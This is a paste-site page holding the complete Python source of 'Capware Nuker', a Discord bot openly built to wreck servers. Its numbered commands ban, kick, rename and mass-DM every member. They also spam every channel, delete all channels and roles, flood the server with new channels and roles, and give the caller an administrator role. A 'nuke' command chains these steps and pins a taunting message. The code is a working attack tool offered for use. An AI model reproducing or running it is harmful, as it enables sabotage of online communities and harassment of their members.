Cadastrar
Login
Novo texto
Página Inicial
Trending
Arquivo
Português
English
Português
Cadastrar
Login
Novo Texto
Importar Arquivo
import json import os import traceback import colorama import discord import requests from colorama import Fore from discord.ext import commands colorama.init() os.system('cls') embedColor = 0x5c92ff colors = {"main": Fore.CYAN, "white": Fore.WHITE, "red": Fore.RED} msgs = {"info": f"{colors['white']}[{colors['main']}i{colors['white']}]", "+": f"{colors['white']}[{colors['main']}+{colors['white']}]", "error": f"{colors['white']}[{colors['red']}e{colors['white']}]", "input": f"{colors['white']}{colors['main']}>>{colors['white']}", "pressenter": f"{colors['white']}[{colors['main']}i{colors['white']}] Press ENTER to exit"} async def msg_delete(ctx): """ Trying to delete activation message """ try: await ctx.message.delete() except: print(f"{msgs['error']} Can't delete your message") def checkActivity(type, text): if type == "playing": return discord.Game(name=text) elif type == "listening": return discord.Activity(type=discord.ActivityType.listening, name=text) elif type == "watching": return discord.Activity(type=discord.ActivityType.watching, name=text) else: return None os.system('title Capware Nuker v1.0.0') print(f""" {Fore.WHITE} ██████╗ █████╗ ██████╗ {Fore.LIGHTBLUE_EX}██╗ ██╗ █████╗ ██████╗ ███████╗ {Fore.WHITE}██╔════╝██╔══██╗██╔══██╗{Fore.LIGHTBLUE_EX}██║ ██║██╔══██╗██╔══██╗██╔════╝ {Fore.WHITE}██║ ███████║██████╔╝{Fore.LIGHTBLUE_EX}██║ █╗ ██║███████║██████╔╝█████╗ {Fore.WHITE}██║ ██╔══██║██╔═══╝ {Fore.LIGHTBLUE_EX}██║███╗██║██╔══██║██╔══██╗██╔══╝ {Fore.WHITE}╚██████╗██║ ██║██║ {Fore.LIGHTBLUE_EX}╚███╔███╔╝██║ ██║██║ ██║███████╗ {Fore.WHITE} ╚═════╝╚═╝ ╚═╝╚═╝ {Fore.LIGHTBLUE_EX} ╚══╝╚══╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝ """) """ Fetching prefix, token and owner ID's from config If there's no config, requests data from the user and creates it """ try: with open(f"config.json", encoding='utf8') as data: config = json.load(data) token = config["token"] prefix = config["prefix"] owners = config["owners"] whiteListBool = config["whitelistbool"] activity = config["activity"] enablelogging = config["discordlogging"] print(f"{msgs['info']} Loaded config.json") except FileNotFoundError: token = input(f"Paste token {msgs['input']} ") prefix = input(f"Paste prefix {msgs['input']} ") owners = input( f"Paste bot's owner ID (If several use ',') {msgs['input']} ") whiteListYesOrNo = input( f"Enable whitelisting (y/n) {msgs['input']} ").lower() whiteListBool = True if whiteListYesOrNo == "y" else False owners = owners.replace(" ", "") if "," in owners: owners = owners.split(",") owners = list(map(int, owners)) else: owners = [int(owners)] activity = {"type": "playing", "text": f"Capware v1.0.0", "isenabled": True} enablelogging = False config = { "token": token, "prefix": prefix, "owners": owners, "whitelistbool": whiteListBool, "activity": activity, "discordlogging": enablelogging } with open("config.json", "w") as data: json.dump(config, data, indent=2) print(f"{msgs['info']} Created config.json") if activity["isenabled"]: activityToBot = checkActivity(activity["type"], activity["text"]) else: activityToBot = None bot = commands.Bot(command_prefix=prefix, activity=activityToBot, intents=discord.Intents.all()) bot.remove_command("help") def isOwner(ctx): return ctx.author.id in owners def isWhitelisted(ctx): if whiteListBool: return ctx.author.id in owners else: return True @bot.event async def on_ready(): print(f"\n\n{colors['main']}" + ("═"*75).center(95) + f"\n{colors['white']}" + f"Logged in as {bot.user}".center(95) + "\n" + f"Prefix: {bot.command_prefix}".center(95) + "\n" + f"Total servers: {len(bot.guilds)}".center(95) + "\n" + f"Total members: {len(bot.users)} ".center(95) + f"\n{colors['main']}" + ("═"*75).center(95) + f"\n\n{colors['white']}") @bot.event async def on_command(ctx): print( f"{msgs['info']} Executed {ctx.command} ({colors['main']}{ctx.message.author}{colors['white']})") @bot.event async def on_command_error(ctx, err): errors = commands.errors if (isinstance(err, errors.BadArgument) or isinstance(err, commands.MissingRequiredArgument) or isinstance(err, errors.PrivateMessageOnly) or isinstance(err, errors.CheckFailure) or isinstance(err, errors.CommandNotFound)): return elif isinstance(err, errors.MissingPermissions): print(f"{msgs['error']} Missing permissions") else: print( f'{colors["red"]}\n\n{"".join(traceback.format_exception(type(err), err, err.__traceback__))}{colors["white"]}\n') @bot.command(name='help') @commands.check(isWhitelisted) async def help(ctx): await msg_delete(ctx) p = bot.command_prefix embed = discord.Embed(title="Help", color=embedColor) embed.set_author(name="Capware Nuker | Capware Solutions", url="https://discord.gg/capware") embed.add_field( name="Nuke", value=f">>> `{p}1 <ban 1/0> <your text>`", inline=False) embed.add_field(name="Ban everyone", value=f">>> `{p}2`", inline=False) embed.add_field(name="Kick everyone", value=f">>> `{p}3`", inline=False) embed.add_field(name="Rename everyone", value=f">>> `{p}4 <new nickname>`", inline=False) embed.add_field(name="DM everyone", value=f">>> `{p}5 <message>`", inline=False) embed.add_field(name="Spam to all channels", value=f">>> `{p}6 <amount> <text>`", inline=False) embed.add_field(name="Spam to current channel", value=f">>> `{p}7 <amount> <text>`", inline=False) embed.add_field(name="Delete all channels", value=f">>> `{p}8`", inline=True) embed.add_field(name="Delete all roles", value=f">>> `{p}9`", inline=True) embed.add_field(name="\u200b", value="\u200b", inline=True) embed.add_field(name="Spam with channels", value=f">>> `{p}10 <amount> <name>`", inline=True) embed.add_field(name="Spam with roles", value=f">>> `{p}11 <amount> <name>`", inline=True) embed.add_field(name="\u200b", value="\u200b", inline=True) embed.add_field(name="Edit server icon", value=f">>> Image is attachment\n`{p}12`", inline=True) embed.add_field(name="Edit server name", value=f">>> `{p}13 <name>`", inline=True) embed.add_field(name="Get admin", value=f">>> `{p}14 <name of role>`", inline=False) # embed.add_field(name="\u200b", value="\u200b", inline=True) embed.add_field( name="Revive (DM Only)", value=f">>> Creating 1 text channel on server if you deleted all\n`{p}15 <guild id>`", inline=False) embed.add_field(name="Settings", value=f">>> `{p}settings`") embed.add_field(name="\u200b\nInfo", value=f">>> **Capware Nuker**\nhttps://discord.gg/capware \nU guys are skids \nLink: https://discord.gg/capware\n", inline=False) await ctx.message.author.send(embed=embed) @bot.group(name='settings', aliases=["config"], invoke_without_command=True) @commands.check(isWhitelisted) async def settings(ctx): p = bot.command_prefix embed = discord.Embed( title="Settings", description="Available settings\n`Only for owners`", color=embedColor) embed.set_author(name="Capware Nuker", url="https://discord.gg/capware") embed.add_field( name="Prefix", value=f">>> Change prefix\n`{p}settings prefix <prefix>`", inline=False) embed.add_field( name="Owners", value=f">>> Add or remove user from owners\n`{p}settings owners <add/remove> <ID/mention>`", inline=False) embed.add_field( name="Whitelist", value=f">>> Enable or disable whitelisting\n`{p}settings whitelist <on/off>`", inline=True) embed.add_field( name="Activity", value=f">>> Change or disable activity\nAvailable types: `playing`, `listening`, `watching`\n`{p}settings activity <set/off> <type> <text>`", inline=False) await ctx.message.author.send(embed=embed) @settings.command(name='prefix') @commands.check(isOwner) async def settingsPrefix(ctx, newPrefix): global config bot.command_prefix = newPrefix config['prefix'] = newPrefix with open("config.json", "w") as data: json.dump(config, data, indent=2) await ctx.message.add_reaction('✅') print( f"{msgs['info']} Prefix is {colors['main']}{newPrefix}{colors['white']} now") @settings.command(name='owners') @commands.check(isOwner) async def settingOwners(ctx, action, *, users): global config users = users.replace('<@!', '') users = users.replace('>', '') users = users.replace(" ", "") if "," in users: users = users.split(",") users = list(map(int, users)) else: users = [int(users)] if action == "add": config["owners"] += users with open("config.json", "w") as data: json.dump(config, data, indent=2) print( f"{msgs['info']} Added {colors['main']}{str(users)[1:-1]}{colors['white']} to owners") await ctx.message.add_reaction('✅') elif action == "remove" or "delete": for user in users: config["owners"].remove(user) with open("config.json", "w") as data: json.dump(config, data, indent=2) print( f"{msgs['info']} Removed {colors['main']}{str(users)[1:-1]}{colors['white']} from owners") await ctx.message.add_reaction('✅') else: await ctx.message.add_reaction('❌') @settings.command(name='whitelist', aliases=["whitelisting"]) @commands.check(isOwner) async def settingsWhitelist(ctx, action): global config global whiteListBool if action.lower() == "on" or "enable": whiteListBool = True config["whitelistbool"] = True with open("config.json", "w") as data: json.dump(config, data, indent=2) print(f"{msgs['info']} Enabled whitelisting") await ctx.message.add_reaction('✅') elif action.lower() == "off" or "disable": whiteListBool = False config["whitelistbool"] = False with open("config.json", "w") as data: json.dump(config, data, indent=2) print(f"{msgs['info']} Disabled whitelisting") await ctx.message.add_reaction('✅') else: await ctx.message.add_reaction('❌') @settings.command(name='activity') @commands.check(isOwner) async def settingsActivity(ctx, action, activityType="playing", *, text=f"Capware Nuker v1.0.0"): global config global activity if action == "set": await bot.change_presence(activity=checkActivity(activityType, text)) activity = {"type": activityType, "text": text, "isenabled": True} config["activity"] = activity with open("config.json", "w") as data: json.dump(config, data, indent=2) print(f"{msgs['info']} Changed activity") await ctx.message.add_reaction('✅') elif action == "on" or action == "enable": await bot.change_presence(activity=checkActivity(activity["type"], activity["text"])) activity["isenabled"] = True config["activity"] = activity with open("config.json", "w") as data: json.dump(config, data, indent=2) print(f"{msgs['info']} Enabled activity") await ctx.message.add_reaction('✅') elif action == "off" or action == "disable": await bot.change_presence(activity=None) activity["isenabled"] = False config["activity"] = activity with open("config.json", "w") as data: json.dump(config, data, indent=2) print(f"{msgs['info']} Disabled activity") await ctx.message.add_reaction('✅') else: await ctx.message.add_reaction('❌') @bot.command(name='1', aliases=["nk", "nuke"]) @commands.check(isWhitelisted) async def nuke(ctx, ban: bool = True, text: str = "Capware Nuker"): await msg_delete(ctx) """ Trying to change server icon and name """ icon = await ctx.message.attachments[0].read() if ctx.message.attachments else None await ctx.guild.edit(name=text, icon=icon, banner=icon) """ Trying to delete all channels """ for ch in ctx.guild.channels: try: await ch.delete() print(f"{msgs['+']} Deleted {ch}") except: print(f"{msgs['error']} Can't delete {ch}") """ Trying to ban everyone if requested """ if ban: for m in ctx.guild.members: if m.id not in owners: try: await m.ban() print(f"{msgs['+']} Banned {m}") except: print(f"{msgs['error']} can't ban {m}") else: print(f"{msgs['info']} {m} is owner") """ Trying to delete roles """ for r in ctx.guild.roles: try: await r.delete() print(f"{msgs['+']} Deleted {r}") except: print(f"{msgs['error']} Can't delete {r}") try: embed = discord.Embed(color=embedColor) embed.add_field(name="This server is Nuked skids", value="By Capware Nuker\nhttps://discord.gg/capware", inline=False) channel = await ctx.guild.create_text_channel(name="Capware Nuker") message = await channel.send(embed=embed) await message.pin() except: pass @bot.command(name='2', aliases=["be", "baneveryone"]) @commands.check(isWhitelisted) async def banEveryone(ctx): await msg_delete(ctx) for m in ctx.guild.members: if m.id not in owners: try: await m.ban() print(f"{msgs['+']} Banned {m}") except: print(f"{msgs['error']} can't ban {m}") else: print(f"{msgs['info']} {m} is owner") @bot.command(name='3', aliases=["ke", "kickeveryone"]) @commands.check(isWhitelisted) async def kickEveryone(ctx): await msg_delete(ctx) for m in ctx.guild.members: if m.id not in owners: try: await m.kick() print(f"{msgs['+']} Kicked {m}") except: print(f"{msgs['error']} can't kick {m}") else: print(f"{msgs['info']} {m} is owner") @bot.command(name="4", aliases=["chen"]) @commands.check(isWhitelisted) async def renameEveryone(ctx, *, name="Capware Nuker"): await msg_delete(ctx) for m in ctx.guild.members: if m.id not in owners: try: await m.edit(nick=name) print(f"{msgs['+']} Changed {m}'s nickname") except: print(f"{msgs['error']} Can't change {m}'s nickname") else: print(f"{msgs['info']} {m.name} is owner") @bot.command(name="5", aliases=["dme"]) @commands.check(isWhitelisted) async def dmEveryone(ctx, *, msg="Capware Nuker"): await msg_delete(ctx) for m in ctx.guild.members: if m.id not in owners: try: await m.send(msg) print(f"{msgs['+']} Message sent to {m}") except: print(f"{msgs['error']} Can't send message to {m}") else: print(f"{msgs['info']} {m.name} is owner") @bot.command(name="6", aliases=["sa"]) @commands.check(isWhitelisted) async def spamToAllChannels(ctx, amount: int = 50, *, text="@everyone Capware Nuker"): await msg_delete(ctx) for i in range(amount): for ch in ctx.guild.channels: try: await ch.send(text) print(f"{msgs['+']} Message sent to {ch}") except: print(f"{msgs['error']} Can't send message to {ch}") @bot.command(name='7', aliases=["sc"]) @commands.check(isWhitelisted) async def spamToCurrentChannel(ctx, amount: int = 50, *, text="@everyone Capware Nuker"): await msg_delete(ctx) for i in range(amount): try: await ctx.channel.send(text) print(f"{msgs['+']} Message sent to {ctx.channel}") except: print(f"{msgs['error']} Can't send message to {ctx.channel}") @bot.command(name='8', aliases=["dch"]) @commands.check(isWhitelisted) async def deleteAllChannels(ctx): await msg_delete(ctx) for ch in ctx.guild.channels: try: await ch.delete() print(f"{msgs['+']} Deleted {ch}") except: print(f"{msgs['error']} Can't delete {ch}") @bot.command(name='9', aliases=["dr"]) @commands.check(isWhitelisted) async def deleteAllRoles(ctx): await msg_delete(ctx) for r in ctx.guild.roles: try: await r.delete() print(f"{msgs['+']} Deleted {r}") except: print(f"{msgs['error']} Can't delete {r}") @bot.command(name="10", aliases=["sch"]) @commands.check(isWhitelisted) async def spamWithChannels(ctx, amount: int = 25, *, name="Capware Nuker"): await msg_delete(ctx) for i in range(amount): try: await ctx.guild.create_text_channel(name=name) print(f"{msgs['+']} Created channel") except: print(f"{msgs['error']} Can't create channel") @bot.command(name="11", aliases=["sr"]) @commands.check(isWhitelisted) async def spamWithRoles(ctx, amount: int = 25, *, name="Capware Nuker"): await msg_delete(ctx) for i in range(amount): try: await ctx.guild.create_role(name=name) print(f"{msgs['+']} Created role") except: print(f"{msgs['error']} Can't create role") @bot.command(name='12', aliases=["si"]) @commands.check(isWhitelisted) async def editServerIcon(ctx): await msg_delete(ctx) if ctx.message.attachments: icon = await ctx.message.attachments[0].read() else: return try: await ctx.guild.edit(icon=icon) print(f"{msgs['+']} Changed server icon") except: print(f"{msgs['error']} Can't change server icon") @bot.command(name='13', aliases=["sn"]) @commands.check(isWhitelisted) async def editServerName(ctx, *, name="Capware Nuker"): await msg_delete(ctx) try: await ctx.guild.edit(name=name) print(f"{msgs['+']} Changed server name") except: print(f"{msgs['error']} Can't change server name") @bot.command(name="14", aliases=["ga"]) @commands.check(isWhitelisted) async def getAdmin(ctx, *, rolename="Capware Nuker"): await msg_delete(ctx) try: perms = discord.Permissions(administrator=True) role = await ctx.guild.create_role(name=rolename, permissions=perms) await ctx.message.author.add_roles(role) print(f"{msgs['+']} Added admin role to {ctx.message.author}") except: print(f"{msgs['error']} Can't add admin role to {ctx.message.author}") @bot.command(name='15', aliases=["rg"]) @commands.check(isWhitelisted) @commands.dm_only() async def reviveGuild(ctx, guildId: int = None): if guildId: guild = bot.get_guild(guildId) try: await guild.create_text_channel(name="Capware Nuker") print(f"{msgs['+']} Revived {guild}") except: print(f"{msgs['error']} Can't revive {guild}") """ Running bot """ try: if enablelogging == False: bot.run(token, log_handler=None) else: bot.run(token) except discord.errors.LoginFailure: print(f'{msgs["error"]} Invalid Token') print(msgs['pressenter']) input() os._exit(0) except discord.errors.PrivilegedIntentsRequired: print(f"{msgs['error']} It looks like you didn't enable the necessary intents in the developer portal." f"Visit {colors['main']}https://discord.com/developers/applications/ {colors['white']}and turn them on.\n") print(msgs['pressenter']) input() os._exit(0) except Exception as e: print(f'{colors["red"]}\nAn error occured while logging:\n{"".join(traceback.format_exception(type(e), e, e.__traceback__))}{colors["white"]}\n') print(msgs['pressenter']) input() os._exit(0)
Configurações do Texto
Título do Texto :
[Opcional]
Guardar na Pasta :
[Opcional]
Selecionar
Syntax Highlighting :
[Opcional]
Selecionar
Markup
CSS
JavaScript
Bash
C
C#
C++
Java
JSON
Lua
Plaintext
C-like
ABAP
ActionScript
Ada
Apache Configuration
APL
AppleScript
Arduino
ARFF
AsciiDoc
6502 Assembly
ASP.NET (C#)
AutoHotKey
AutoIt
Basic
Batch
Bison
Brainfuck
Bro
CoffeeScript
Clojure
Crystal
Content-Security-Policy
CSS Extras
D
Dart
Diff
Django/Jinja2
Docker
Eiffel
Elixir
Elm
ERB
Erlang
F#
Flow
Fortran
GEDCOM
Gherkin
Git
GLSL
GameMaker Language
Go
GraphQL
Groovy
Haml
Handlebars
Haskell
Haxe
HTTP
HTTP Public-Key-Pins
HTTP Strict-Transport-Security
IchigoJam
Icon
Inform 7
INI
IO
J
Jolie
Julia
Keyman
Kotlin
LaTeX
Less
Liquid
Lisp
LiveScript
LOLCODE
Makefile
Markdown
Markup templating
MATLAB
MEL
Mizar
Monkey
N4JS
NASM
nginx
Nim
Nix
NSIS
Objective-C
OCaml
OpenCL
Oz
PARI/GP
Parser
Pascal
Perl
PHP
PHP Extras
PL/SQL
PowerShell
Processing
Prolog
.properties
Protocol Buffers
Pug
Puppet
Pure
Python
Q (kdb+ database)
Qore
R
React JSX
React TSX
Ren'py
Reason
reST (reStructuredText)
Rip
Roboconf
Ruby
Rust
SAS
Sass (Sass)
Sass (Scss)
Scala
Scheme
Smalltalk
Smarty
SQL
Soy (Closure Template)
Stylus
Swift
TAP
Tcl
Textile
Template Toolkit 2
Twig
TypeScript
VB.Net
Velocity
Verilog
VHDL
vim
Visual Basic
WebAssembly
Wiki markup
Xeora
Xojo (REALbasic)
XQuery
YAML
HTML
Expiração do Texto :
[Opcional]
Nunca
Auto Destruir
10 Minutos
1 Hora
1 Dia
1 Semana
2 Semanas
1 Mês
6 Meses
1 Ano
Status do Texto :
[Opcional]
Público
Não Listado
Privado (somente membros)
Senha :
[Opcional]
Descrição:
[Opcional]
Tags:
[Opcional]
Criptografar Texto
(
?
)
Criar Novo Texto
No momento você não está logado, isso significa que você não pode editar ou excluir nada que você poste.
Cadastre-se
ou faça o
Login
Idiomas do site
×
English
Português
Você gosta de cookies?
🍪 Usamos cookies para garantir que você obtenha a melhor experiência em nosso site.
Saber mais
Concordo